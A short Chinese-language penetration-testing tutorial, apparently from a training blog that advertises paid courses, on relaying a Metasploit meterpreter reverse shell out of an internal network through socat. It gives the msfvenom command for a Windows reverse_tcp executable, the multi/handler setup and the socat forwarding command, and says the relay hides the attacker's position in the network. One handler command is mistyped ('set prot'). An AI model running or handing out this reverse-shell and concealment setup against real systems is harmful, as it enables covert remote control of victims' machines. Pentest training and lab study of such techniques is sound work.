【原创】内网转发连接外网meterpreter
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1 应用场景
在多个或者两个不网络中使用正向连接远程的攻击载荷,但是有时会有限制,如防火墙同事也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻击者在网络的位置。
如图

可以使用socat重定向攻击载荷 连接上meterpreter。
2 操作步骤
2.1 生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.147 lport=12345 -f exe >~/Desktop/lab/s.exe
metasploit 执行
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set prot 12345
prot => 12345
exploit
2.1 执行socat命令
在192.168.0.156机子上执行
socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.0.119:4444
2.3在内网目标上执行生成的攻击载荷。

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/1203.html